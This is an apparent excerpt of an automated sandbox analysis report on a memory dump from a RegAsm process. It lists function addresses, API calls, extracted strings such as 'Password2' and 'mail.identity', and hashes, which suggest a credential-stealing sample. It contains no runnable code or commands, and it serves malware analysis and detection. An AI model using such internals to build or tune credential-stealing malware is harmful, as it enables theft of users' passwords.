                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                                                                                                      Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                                                                                      • String ID: 3CD
                                                                                                                                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                      Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                      • String ID: Password2
                                                                                                                                                                                                                      • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                      • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                                                      • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                                                      Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                      Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                      • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                      • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                                                      Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                      Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                      Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                                      Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                                                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                                                      Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                                      Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                      • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                      • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                                      • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                                                      Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3503910906-0
                                                                                                                                                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                                      Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                      • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                                                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                                      Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                      • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                                                                                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                                      Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1886415126-0
                                                                                                                                                                                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                                                      Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                                                                                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                                                      Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                                      Function 00407FA4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      • Opcode ID: bfbd24b6eb9f059b1fc6dbc4b2d82ea2ef06db4a5dbaa2566208e2b96fd1a008
                                                                                                                                                                                                                      • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfbd24b6eb9f059b1fc6dbc4b2d82ea2ef06db4a5dbaa2566208e2b96fd1a008
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                                                                                                      Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                      • String ID: C@$mail.identity
                                                                                                                                                                                                                      • API String ID: 1439213657-721921413
                                                                                                                                                                                                                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                                      Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
